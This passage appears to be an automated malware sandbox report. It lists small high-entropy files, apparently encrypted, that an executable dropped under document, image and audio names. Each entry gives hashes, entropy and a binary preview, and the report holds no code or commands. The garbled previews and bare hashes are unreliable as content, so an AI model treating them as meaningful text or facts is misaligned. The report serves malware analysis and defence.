                  Preview:ARRJG.].2...[...R...!Vr.n.g./.,.l..[@..{y.....Y.+O."sB.&.......4a...;|.P.S..^cW...V.;t..OyPm...m.S....?v.b.{N.43..(J..$..J....h.\M.P.J$&....g.....Y..7[W..._8...#<.c.....^S.N.X....<'D].....t...U......p."g...k.qo...qwYi.B-......$k..L- "M~j..r.p.[E..g...e.....X.c|......k..A.X6a../...k.g..9/.....MW.........1B....x...?.......\.}.+...|...n...QT.p..w.f....\c.p..WH.;...|._.X.....&u.V]l.1X.F.^9/..........C.#?....&.L....\.R...z.Ac%...O..u...6....XK~?....F+...q...$..).9I\<..=M.3...{.M.G..Y4..j..{V....e.W....ZF...lSm.Gl....*.ET..........nc..r.....P.....h.8R.`"..&..Y....-..a...9(........|..&A.4..7RF...L...^...S.....M....3<.O..[..v...m..s%.Y.3e.]..0.B.-.9-IC...o.8b......6V:.hjD.h.m.I....!h....H.z\./.r.$E...eFk..(6F.gfWc.....W.Dfw.I.R...(^....a[.V..=..U......).Ex........t....T...K.o.c .U.B+....L......R..ag..a.........../t.....*y..o.N"..V..H.x22..$;Y.!...=..]....i.3.[........GU.p].*cnHJ..&Q...S..w........L...N.iA.u.8../....j....b.s...#...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWDRWEEARI.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858076302521836
                  Encrypted:false
                  SSDEEP:24:2r6pKjXheG++o/+2Lvxd3KH2PzmmScuAobKq6A9xjdxP5qTSZ2XTrIvEppNCHLY0:9pZr/lGWPzmmTcXOTSZ2jrIvEwV3nD
                  MD5:8165E9AFC3611813EEA1C4ADD110FC48
                  SHA1:DB0964114D616CD1669BA1583F64314504B11C65
                  SHA-256:92C3C26E87CFD19A856CF7AAA71F6B9D8D7D87128D734017BC4A762B8AC2806B
                  SHA-512:84B73F981CA24BD8E5687B6CA83F9407D0868CD511F8BD0774EE00811FA19E71EB2A7C2E4CDFD4EFC884478C73C9D6C7D84530540DB0FC6C035A5ED6FEB766A3
                  Malicious:false
                  Preview:BWDRW.:vk...A}..\.`.Hn...vRr.-...W.1..O.b..[@.Xd..b"...P..R...:..e.....S.t...u...i...d..cxu;A.. J.QRg...|...m."_!......C..p..P..%.........Y.y......T.2B.......sC.`.!...T.Z..IZ.mgW...v.....%q....^z........#....<;..x......a>7+,C.2.?.z..j..W....$.SW.........G...Y..~..7NGo.+...M._......2.6..M.0f+.d..,K..c..s`....>A.94.J0Bs..^.. ....i....".N..Fz$.h.C. .j.x..3[..*5.L} ..h.]u..o..0.i.X....+..f..`!...@..0..1.6.....*V...p.dz...n.o?...RKU.P.j..s].%....... ...>H(rX...._...0.......1.l.-*'...tAG]p.(..K..5m..*F.u,-.j.M.OQ....q`..2.....[.L...a.,b.x.YV.....a.*]3._.u.v.[.0\i..8.)!./......9.EZ..E...T..i....s}SV.q..;.....q....E]>..(..:....M."....#k.D.R.qq.....0.9&..../..F.5...V....hx..XW.7J..3...E._...f. M...5\n*j.B....;'.......!.1].n*.....E......f..[...Q.e..G.6.....J~v?O.P.G..X.*...ZwT..J*........_..TG..=.q.>3..M=.....|'...mB...QT...W?.Q.U..*........k....#....F..G...{.-PGb...&d...8.~..H.. .q..R]0.;.#+....Z."..%...'P.>..+...bB..C."..../....o9jO^.!..~{.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BXAJUJAOEO.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.86494769973924
                  Encrypted:false
                  SSDEEP:24:5vk6GKEHO5x4QwqYxh7njqXfMyAmrGs0C+O/xEmyM72rB0tqiTj0pPCCg3zbD:9zzas/a7jqPMyAmrGsYfMqc0ECg3nD
                  MD5:098D6A858843AD1E5BE80AFEAC827E49
                  SHA1:1BD337B0DB1706CB4CAAA07C329C63C2D649E9DC
                  SHA-256:06CE40F654B69C4DDCB8E95E43A78AC5A48B2E7D728C8464A6A562ECC4DF0971
                  SHA-512:03BACFE8E47C2FA13ED5C9CA643FE26CA74FF0A042E39B212275D13937EBEFA6D26D290F7F8E21418A50CA536E6382287B6FA947D6AA8ACAEFC2533D9FDDDA98
                  Malicious:false
                  Preview:BXAJU.bv...U*.a^.....R(A]..=......WvnL.7. $..}.y.w5$..P2....K.O....8..<.#.}j>...z.k.'.c.:.:.....C..]..._..e.....;'..Yg)....=E..0q..%....UW.(|4...pB.[.G..E=t+<..wS:\.J...<.WN5_.\..i~G...l.:...n....xs{.==\..kp.....p.A.~|.ez...........(.@B..{.0........:^......R3.........k.xEZ..;..G....l...4*w..O...)..f.f....._......s.8.D.w..3r..ON..\Z..`....."....cklH...c....r .D...Y...8.`n#.w.q...2..~....).'b/...!...f..0jq0....O....q.1*...^.|>f..4......o.>...7\....&.>;.I.x..TE..k......A.........].....Xh........O.O.SV...*..#..We.SD'..gm.'..{..Y....c....? 3.|}I.9.s.4.......$.B.....9...0.>.....8..[..>..n.....Q..i....gb...$..s..~]..n.o^.2.%.....-..."R.....i<ur.U.|...O..4.5..^2....P.6Q^o.}{...:..f.h....'...%n...c..aI..W........(...D..i.... ..Ld..Zf.z.w.!...j..|$R.=.U./.i...M......}....vA.....z....}....z.+z..b....M..v...YY.0@.D3&.T...d.....E7."!.........gI.5....._.QTJ.^.I..3..r.yy|\.....4.v.:@..mu2.k9.o.Tr..\9>....IsG..9.U,.....h.-*H)..}...[.%...'....)].d....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BXAJUJAOEO.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8594922445358355
                  Encrypted:false
                  SSDEEP:24:n2Zvz30VVPx3JlGNBDQ93+KwHUDt4D/Jt+DAj7Y+HIn75cNZf5DtF2qXsU3zbD:2h30/9bcDQkKwHCt4L+DAjA75CRtz3nD
                  MD5:0E8854F4F6E2824324705D8070DF3173
                  SHA1:50E4AD099B0A22620B3B4BDB8225AEB3278B74D5
                  SHA-256:E5BA2A30D14E3CB283FDA77F02C205DAED44BB88E8D55B73D4EE1AC116C46E94
                  SHA-512:60BB84A7F740198E2B189B9C3E46A84071719A62A907832D80D5496BF517B7C986D9F4498C9FC090F437368A6B54DDB04D2F19CD4B3BC7127DD687D1EA0CCDF7
                  Malicious:false
                  Preview:BXAJU..j...w...[.L'...+..86.....VI.=.w..t..tY.<K.C..,......#.C.....7..xg..AF.Ns.Q.f.`..D....Zc....Z...u..7a..GT..X....2..e.$.....]G...^.;.[4.uNb..uqHZ.+s..~4q.a};...Pg;...'Q....AV../Am....=.2.Nb.oW|....a3..P5...>...`p.]E.....4O%.l..F..D{Qs..I-s....U.q......e..F...=....s0.&....7.e....B.S!.U.ln..... ..\v9..H....C.Oj:h.....@..!.....K..Gd....Hi.j.N....Y....gJ..L-....<.S".0....B..,.01]...R&%..Cq...._....f...ZkF._<[.._..O..........Y8r.K"_R|G.....k.....av....1.|..z:/>Hx,.a...m....!Y...F.qt.[....hh.H?.(}...|R.iiG|.....&.RU.bc<.....L..i~..4RF...9...].(.....c#..o.0...$n.P...E....3..0.b....r...iU."._....f........p-..M..6.......8.-C1...i.(.{.lcB!k@.Cl...q............!.....O...F...e.A....^............p,..[..O........4.l......dP.h.7.....)...$..,.....#...~...^H.[.,.*t&.f.'.2..`.j.c .WLJ<.'KN.P..M........,mvt......6D...~e.vr...c....E....]..c..F..w..SK..HE.......)].....d....m.....Yj.LdJ.o:{...c.h...3.......n.....W..;.........*.2.sS....m...7

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BXAJUJAOEO.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8448123723839505
                  Encrypted:false
                  SSDEEP:24:3Kedkv1cWdHLGNJkt1u4AzCsDT0IiZu8tTHwGkcleuQ6n8LH7v6GV1Pq63zbD:3jc1c4HqNOtNsIhQGi6n8fv6GV1C63nD
                  MD5:97E87D1BDD390119872A6B10F4211CCC
                  SHA1:C1765B44B0E33C54CCFE525DC6DAFD51EE70F64F
                  SHA-256:ED3896FF03D636C31E26D781CBF259D079C6CDDF9CFB4A71AA5BBC93AFABE587
                  SHA-512:A12E10E510AF7205722CAACA0E8C4B5A183F7A146EC3C68BFC6ABE24BB32F40B15FC41CC9A580496A9A3CE1D85CD58BB01E3FF7B0A9031E234822F20209C9A16
                  Malicious:false
                  Preview:BXAJU...O..#9..4h...p..Nb.......N......f.7...0}...[.JXG.#I.i...".....P.?..B.\X.\/..............>K...X...E.t..T..:...#....n.-.)..5.....&{(e.k...J......N.....L.H.-..&. G:|...p4.=..%..L.8#!..`.m....F:.J..P...W..}..xe...w....E.HZ.o.D....3..I...hY.......wLy.DW<...<.....|2H>c\}....S.d..T.{.K;F..`.t?.+@.m.......a...Y|.......$.BM..Z.(....WE.*..Q$K..0..E..........O...9..L.aG.....+.8.~=.....$.^.GX5s.....F"...b......n....3.Sb.,..*:e.....;Gm....5.....`...]zXi%..j,..1{6<..]$...H..N.d?....V..C@DI.R.O.n.'.|..h._b..5.o..d../....C.D...4..B)^Wu1....../.X.1.*...$n.xfts'y.......k...2/.H....S#.l...0*...,.!|.}NiZ...a...1[l...1].....7.;.....GG[;A.TT;~.{..W.Vbw.....t...g$..i....'Q......J)..Tz)5.(.#..n..`u......B....n..s..*.d.[SLTD.5Y...h..,....z........U...>.."j..i.\t;..|.K.e.!./.z....u./..8..A..f..lG.d.;.(..&...NW..D.$....w`.w.h......0w?...?{..+\....p/E....$.......r...p..wf...[.#..3l..O.A..#.X~?K.\K...'..F`..%.........g...YJ...9...-..r.'.7niQ.p..N....4D.......Tu[NE.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BZXCAHGGQG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8346283325045345
                  Encrypted:false
                  SSDEEP:24:4BSQt7ZGDj/Jeg8pB+nLWuRr5qSicnShSecRyKRY+ePhDG7061Q3u2xEp3zbD:4BSQmDj/v8v+nv5qShSPcYKRroK061QE
                  MD5:B09EB76EA2C1F06E5F0BD70894607E04
                  SHA1:A1A7F6086808A4B297DF24EB4222A850C731B80E
                  SHA-256:2D0D7C9B35E755DE6FF2F811A5D91CCF603797BD17CBA00B7BF22E87D29FC2F3
                  SHA-512:7741255A8C645BB524EDB2E653B174457A2C5B46430B23B516689120A5254F07679C12AD49224513F521D689E0F34B31848080285759864D7F78C64D90160F80
                  Malicious:false
                  Preview:BZXCAt.VFz@@....8.@....308.#.'%...O.az..1=Z.}.CAeV..9G.wZ.x.9...............*.!...............?......L2....a..6ne.8..$.4.|..rh..{.'"S4...8\..j5....)..K..r..Z.......#.2X....e....[...;.'.f`vi'7D.m~..)..Ck....3..x.Q../R.<..F...9J...'.+l.E.....AD..Lf$.|2.[y...6.zOM..^..B!.......}.0<..b....[......3B.a..5..+.)M..6H.D..yh>Y.;.5........0..9.x...r.-...giF....9...8.<.../Ty...S.....T......F..o...RsM.)..s....$.u..P.T}...q'EI...a...,;.n..`.[...9.L..[&.j1..j..-..T........s..0...)b+...:..>.V...3k.RM%|.6..h9|...?Hd.%.8.......dW...h.{..&2.....4..E..cY..N..O.(.>`..K.4....=......K.0...$.4.....(...j.O.......... "f{..x.H.d..,K.s=QvOk..tP.O#.oR$.<....tPG..HN%.#.:{..9.UG..[L..f%.`)v..._.F..[.YJ..Q......WI..Y..T......)]U.....MO+..F.`0..DA{..!.J3.;.;..Cy...gV.....rI%.&.C(..i.Y...H..0....4O*|[.Q=.L1^}w...D{.2.....I..D.2......;..4.._...t..lo..~O..1.X..8.k..6..H|...j..-0..P.?..X...9.=.....).}.gU..U.U..Q.qn.d.9@.%M%.....c.e....Q2Kc-..<%.VmT.....o.....2Qr.h6..@)D..(%!.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GJBHWQDROJ.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843512332388988
                  Encrypted:false
                  SSDEEP:24:CidOm2+PYRvVWUeVm4MEW82l4j/EZ5nHaWfGF/Bh+0thP2tdBLllaJb89k3B3GFT:VbskU4BMxlOeHaxphpTPUrLllOTk3nD
                  MD5:FC2E4F912D4D394EBB308DC6D16D1239
                  SHA1:C18BDA96359CDE818B645E5804534D6630C57EBF
                  SHA-256:DA257533CAE7379A3036FDD7371EAC670492FB7EDEE5043EB1512AE291247EA9
                  SHA-512:C6BFDE96C55483DD549C5ACF7CB60679D5944D9C983B2284CD8E2A1982F6A9BF13AFC2F8717D934676778F5CEE0596B6AFBDB96D7B7E2918070FC686E412339E
                  Malicious:false
                  Preview:GJBHWW.X..0..u....'....M|.6.'g.. .n|v.HO...u..7.\...o.U.1....I..*..g..t.U......V!..w.;[.a. h.^.6...=.....f2ygH7.*\.....Z........L.I.O.l.Syl...wziV`9L..9....'...Y=.4.....x...\?"..=k|......b.2|A...D+y....r...U..&Y.......uj..kw._...5...&i.l.ldIS...)0K8.Xid30#..-?2.1! !kE.6.m...-.....C....+....x.l.6.t..Uw.s*..bp;4+....E3..!.c......L..nHK...k..#...T]R..A.....9Q2.@.*_t..P)....!...r...nE.A;.i.U..iK.KQ....Xeu..n.9.....=....:.K..#..(p-.]D_.m...0Q\....d.....,?s....\H.%V..h..n.............P1............).....F..!U'f...).d.i)..a 9...Sd.O=J..1..}E.....X...J..K.......K.W...W7o.)........jn.2..6..Z..3t).Y+.@H-y....sI..9A...\.3J.....-7..*.,.iv. ..x.>..r../....^5..LQ.h..).L:.C..,.....,.SF9....E.c=...ae.B[.$Z..V.^.d.-. .S.y..$.kQ..a.EG.|.....u.#.."......ZI..s....p....6..y.n..{.o..E....j.'..G......g..p%...;....j.`XA..b@..{.a....q.q..+.<....2...!'..<.-..U.c.6.CtpN..........D6..#....:....&.T...x..w.(..c.=T..;..-............R...~..q..t...P...8...o.._...~.e.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GJBHWQDROJ.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8525921841476665
                  Encrypted:false
                  SSDEEP:24:W3tjr+Vo16i6YEE610PJEcW7rQ8X4SkDrWGsxkrP6J9vFhI4wAr3zbD:wtjZFXV6aP2cWvQ8X4SkGFWPsdhI7ArT
                  MD5:FCC9315AFEAAF04127DFE01A1D8F5DA1
                  SHA1:21877A9610CCF9E033EC7405FD2C6086FFA1105D
                  SHA-256:BE4AE184C3F6144701555AB0CF3DCF34E7B9066FADBA1EE49031B0A40A57E416
                  SHA-512:489089F4EFDAD6C163ABE96875785F7A24196B93FC89270E3436382BB1C2147B84C0CDE1FAED845E403ADC363D2885A0205265E4781FFBD49E908EF26E237C3D
                  Malicious:false
                  Preview:GJBHW+..l-t...>.<S.}..7.N..`.c.N]#Z...1$.+F.......{vp..ko..~..Z..!.f6."_9.=..UU..Q...8..NQ..xd. <C..l.>.)p...7.q+[.%.P.fR..."..r/..(...h....+.Yjw..#.>..5.2.vg...;xvc.....jDH`.>.!.v!.....<.`pq..a....).v..E.~%|7.0..!8.i.h...03A ......ql.1n...i... .w..8f12.=...<...D.M=.G.Z.w5...7...c.=.R.5:..............A.2.~...4..$R`k..vQ...pS..."d=z1..L(....G~..b..\S!.7.p.....F)I.*...\.M..(..t v..K.........^..1......%}C(.e..J..N..x...".#..._.EG.iK..5.'`..]#..Ic./.........'v`...J...Y....M..),+...s.S..^.D.y[&!.Ze6YP..ne.[!..(.....`..96v...h...C....ZkK.?.h...&s".... ....'..... ...=...B=C.=x.$....g*..>8...K..1.B........RK....W{..$.D.e..,....)}..u.r..$..3...........i..x....r..eJ.Y..>2G.k.{.@..^.q...8....>..=...S....j.4..a.......]p.I....%'..YI"P.....K..F|^*.6Ad.6|.k}FiGtr.*..+"b...... 'z zzx,.]..a>..U..\.0.Z.#\~.....X../eX;...-....X.S,_..S........U(..`........}trMr9...\5......Y.H.!.>.r#N_..\...[#I....o....'R.|e6..N....1........../.....B...#AeTSub.kK$.*D..m..=cc

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844117085659355
                  Encrypted:false
                  SSDEEP:24:GcEHqGxb+eTVxzSoD4KqxfJYiZnRGob1eaVFNpLhccMqr8Y9ny+kjjZi2RrUZ93D:LERV+epxGebYRGobQaL7rPAjNRrUf3nD
                  MD5:2898CDE2E8F81318FEF8E92F26477D96
                  SHA1:58E600DC3C6297EAF761BF8B2CA87CB02A9DB452
                  SHA-256:E19F5C5C9304711AF3FB201D8F011578137EAEAA50584C79337E62B6B5678B9A
                  SHA-512:7994B19E588390D5B4E590162EEC303C88E51260BBECA3102D825FA1B477E9509AAF8956A00B31299B1B1209C6E56DE94C8EA8C17AD2FCB6CB1C414226158327
                  Malicious:false
                  Preview:GLTYD=`..........[.3...A|......?..1..Y..[^......f.E.>#N......\e....+.(o.z.....ba.$..|8.Q..MT..St..{..M.l..!..0..eX..SLL..i....Xo.eeh.v..J*..W.s.Z....+.C~.."..G..F.4oJ..TE...h..OZ:.e}.<.>.c........s>....%..b>..y.fy.Y...i..o._..n.IG..oe.H..;?..-..2a..\@>.!.+$3...W...X.~V..Q..U..m4..=.[..4.V<..T..C%.g\=O...<..},q.i...<.J...;L28H...7y.O.8.....1.?.>...T.k.?..A-.....pQ.`..d....Hy Z=.....}..51GFUX...r.h..<z.B.`.z......#.N.zZK...h.n.[,@q.`..........t..M..31K..f@H...F0R/....s..).<,.^.:L.g6....N...9.%T.=..w..[.7>.!._.<O..'..J ..]..MAU1..m...Z....h.|.y..<i....R..7l...&E......)..p.zK.N#V.Z..dQm.....=I....w.{..q,#<....W.TL.G....'...4y......`}.....,.xo..q..[yu...q.....Fh.tU..2h%.Lg...56....:...[.s'..L.S....(KJ.f.H2Q..W.>2.....+vo.e.....T.D{....u.7aC"....o.....x...<...e....F..A$..<v..s9..4..<.*...Q.7x.W...M$...7um.qv}K..oW..UJ;.^..E4Q...H.........-2..E1U.x.&u..e{.P@.Q^....oGK..TY..T...t..#.X..j.v...FqC.....r.g`).w.gY.H... {#.(......'...S..:.em

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GONQPQSVSS.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.840665746414963
                  Encrypted:false
                  SSDEEP:24:fVMyW413vUjIHIyk6juQVEaInz2q8/Xh7o6x6cHbbGbRP29Mory3zbD:9MuUjAIsjXeadXhE64+bbGbRe9MSy3nD
                  MD5:D47BCE596D49B15FFB91658C56E9D3E0
                  SHA1:C3EDA32CABC32EAD9DE1A3589C4E83A5920DB71C
                  SHA-256:6F2FE270D38F804A8E3FD58F48BD333FF582AB98EAB0FD21EC2DC64DA8CE0206
                  SHA-512:5AB2E9F47F87004234D444EA1FE7038D9D0B48A12DF82640E7E2B9F00D723849A1E0AECFB2A7BFFBBA86514CF4BA595AA9C0F138E2F453168D759B7A68CDA551
                  Malicious:false
                  Preview:GONQP..C!.oPQ...9..n.E.F\..S..F=o5.+4..d..H......Wpl...D.o.........w....5....C.<.=Tc...oqm...4...r...?......q.'....WD....$.N..mY............[..].z.........F...g.nF......Qj....h|p...[....... 9..8......-..FE.....]|....r1...]......y.@@../aN+..B.'.`8...u.0'"..@P.*~a.W8Cu.n.CK..s.It..z...,._.!?......\.O......@...^....g.s..}...t...fe..}.ON...Q..U.S._...6..aB.w^.u...s..63Y.w.v..G%.....*<iJ.R]hZu.]`...|.S.k....f..f..1...@..:.....5....5F.w.u.u}../4...(=..1@Z.'....v,A#:..B....d<as0.....Wo..GO3...=TA.}....C.....[...n%k...Z..d....,.t......2.O..2.[w....U[M...Q}".....[q....u.m.'.H........S....DC.I.CM3._...m.7~.M......X4+......K.1N0.h@....F.....1.V.....@......-x......+...!.......L..4......G...".;..}[>b. =x.7.,y..GI..'.v.@...O...<.onD.I.N9?f.X._T.;4.....H..2..y..n.....M...b..V..R.r>....7..B:...!.&.s2.5)R....\...,X?.8.9... .}.%t.b...,.;.;...9/..%.n..e3...NH.P...u..|-.Fe=i..y.yar....'...;.......;...I.......\j..i........ ]......:..^..n.v.......%Q5.l...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858390543762346
                  Encrypted:false
                  SSDEEP:24:HDI860at9CrA5bnR8M+YIqd2+q0lco38qwxBIeSkhPnBqrq/Fen3zbD:Hav9N5jR8M6+pOKwPkaUrq/M3nD
                  MD5:6E0CC6D9BEF7944AB82C8B4901CEF8F4
                  SHA1:A4F3C0853A0D130402E00800D2BEF1B871C69DC6
                  SHA-256:AAA5FD67A6C4988466F3325C28DB51A5B4E88606D42BE296BEF0BF8A0314C434
                  SHA-512:734E92A73202FF047B4431333DD4D09685857E35F2579668CCE7D8E72508B5B5398704C514B9CFED3A0485FD0DE3EAAF0EA5B2F208A2FDA6E463962C4DB28857
                  Malicious:false
                  Preview:HMPPS2....a.,...6.*......A....IW...k....O.!Xaf]2.>&.*@:..sSuS.eO...o8.......t.....(X..T!^_.'..r..{..............K...]....!P.|...x=}. qw...X.~..,...2...ot3...xREI.....=..(.*~.h....I.... .xCN.......Fa.%?.....|'....(P/jF_.....*.b.p..6...h..v.!.};..f.-.U?.n...f..Hp...\..>.1*GR..K..N.p.g.a"&z.1...i(.U.v..(...4..Uam..a...V.).)....g.o....B...Gz_..A6E..`:.A4.j.G..0.Il(.0.......8S9.....=.`.MAs.*?;..:_.....T..V;/..^e...p=...../..c. .h.*m...v...;.f..uLs.iX...>....t..]d.....T..-X.p.......G.;...m.Y/.ex+@ZsAo...v...Q..>.Luj...7.GCS.vR....d.P\C.b.....i..6./...K.o ......P.,..r...,....mj.:..j.b...N!..D...N..jN.y6.^".6.H.J.s.Y,~.7.8^K3..,.DPe/1......xi.8%.O.DPE.YS..9...t[........ ..........}]f.$|.[T.i........H.o..H.w~2..\R.Jam,.....7...o....X.w.M...P.....[{~:.IK.i.a....yJ<{.SZ..^..N.v.O.K/.y.../#:9..:3.]..V..=..{.`....i.e.m....y...Czm3..<.8..8 ..\Q..'v.t....K.^......_(./........X#'..;...h.P......Xnu.).jV.....c..JW.U..T.en.....'.{.*g..(.N.=....T`..\

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IZMFBFKMEB.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842221089341733
                  Encrypted:false
                  SSDEEP:24:I5K5fvy7vyP3sv2MjKZAf6IJMsyGgJINCivs1cQDiPVk1XYE3esU+UA9BogqumIT:7nEm3sv2MjK+flJlieC2pQD4CJYnnXA7
                  MD5:83EB8996754B1BCAA8F3441B39097713
                  SHA1:06BBEED9CF818D607AB78F62B2D0918FEED4A18A
                  SHA-256:C8740A13521A83ECA43FE45AAAEF1F175CEEB03008F7158606FA0BDE6A626A20
                  SHA-512:32F48357276EB1C60C2D8CCD3C9E373CE9D37DEB83C2F994815B7C3FFFE58F679CB1A5D178DE0768F4FD26016C6C978E0D67F8655E3D1A6A73363CEF9844CB5D
                  Malicious:false
                  Preview:IZMFB._O...$.4!....>...j.#.R.7\.e,...........Q..3..^...T.W...I4.|.....=..l..(v.O'..TB}.a5T..mq.t.t.b..I.S'<...n97.g.`..[.h...f&_.T..q2_..dNC..c.a...w.I....R......;.*^...RH.mp.....=^bqT..Y..y.T`."...~.....M.1..%...?..}...V.._J........%.i9=6.+.=0E.e.q$...z.....S..Q.....n'i..+.N..g..!......W...8...&>`.,?^.2...xON.ro.J....G....[...r....1..|..p.|....w.......w.R..2hF..,..$..s>.d_Q...^|e+V)_.:.E.O...`(2..c.B.I. .e.0.7,c.}.I...7...k+....sd.....tJ1.....i..A..L....P..j..q......K..+..2.b.."s;t..t[E....&.k....l.xx.t.D.,.+d.o..L..>..........7..Du.[P.=xjJ.KE /.!..... O..(.......W....]KK....0.......r...V........J.M;..<..'...N.P.1..Y.Z.C.T..M...v......v3.........k^...V..v..f.s.Lb.(}..._F+V[e.d..mlh.=>#.5\q.'.\.p;.._.....G..q.Y'./P~.*.(.j.n...j.J..Z*...T..9B..... .l..eu....w......_...C..`..DW{..D...*/...3.^....[T.....y......P}......bI....p.a)..;....>n.f.qE... .l..O....U[.T..5.{c...x..Ty......YS.....N.x...|....4......t(..CJ._(1TF.......ou..~N.bO..|..|...%..?.JB

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IZMFBFKMEB.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837479211213915
                  Encrypted:false
                  SSDEEP:24:x6iYJQXZo92kBHQ2+Ki43T546+vYsHIJo2EmfVALPPQLnGcs2HX2b0RviD63zbD:x6iYJQJo92kuj8K6BvmtYA41H0nD63nD
                  MD5:8A8C01749EB0356AFCC036AC67E9A600
                  SHA1:8FC924D02C1488EF23EAD5293BE2733698D31B9D
                  SHA-256:E96A6E34338D428644BD8A8438D91B5DD4F4BB37B7762FCE96EF2084186D1206
                  SHA-512:9C897B5E24D70A4B12BFFBD8F9FD5CF9C3B53D529D87CECCE33C800D0D476652AD6FE185C8AE076A29280DD5372D54AE36A812562130C3EAE459D2BB2449876E
                  Malicious:false
                  Preview:IZMFB<....M{.)..t....;j...E{....|..R\../"@V..l.-"3Gb..A..~..Z..{..o._ ..d.....61..y..f.......s..D.x..4...8.n5.\......<...D....[i.Z/.XX.....I..v..?..S4u%Su..4........>.,(...n....0..z.).R..6.B..(..D2...`....~....B-.z..`._.E.u....1.<P.._....}G...B.C..dQ...)X.E%..w(..)!.3s......=.]..KS..>...].>.....i[..B....F...$.........j..\.....lQCS"..K...%b.7!.}o..1fy.<K./...,Q16..,.G1..M1.A..`...0~..t.......tO.z......).|r.........^.)..m...V....nY.e....8.{.......x.....}.,....`.....E.'.......f.8........!.L$..z.4:Z.a3...-.il..K.KF..T0Ho[.-u.T..{m?.-'b..m..,g..S......y.@......$dx....B...;......Sh.8....kV.wD......]RIc......t."[..V.....{.........dCu7K..M.b{.9"A }...5...0.....-.o.".....h..M.pv'^..8..).t.J..v......xy.-..;.r.+...z....".t..i...2...(.S.6a... @U......(....#(....0y...d.o.....F..w........9..XU...'.(.}.|.A.......+.l.b.#16i. ...rhc..~V..2.]..{..9.B...2..A.0..An.!5.k.s..<A..V..y.4.GF.}.E.G...S5....A..g/.....%..4d^G...2."....c.` .B.A....Tr.1..O8.0l..oJ.?{.m..B..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IZMFBFKMEB.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847986411190699
                  Encrypted:false
                  SSDEEP:24:u74Bkb5T5FsU/PX42yjj20biUlf4skKbY0p8VJ8K5ZEjfYIVMlVMKKF23zbD:o4YTvsUoHf20b1lf4/P0po8K5ZEDl2lN
                  MD5:F2AE44360DEBD793845FA1AE8636ADBF
                  SHA1:A75D6D354DD44C3C198E84E14D353E14A8ADACE4
                  SHA-256:9E5759F11F5A34D20EF19167CAD2F94F6445EDA209840D067B5A0F248B87C54F
                  SHA-512:DA22ED0520118F1A732BDFCDB58CCE741C838C06A814FE174777F39EC8FC3D41250B9C1AE15815C6D54EC485F2ED6E018C64C3B57FFFAFDEF0940BF5E46667EA
                  Malicious:false
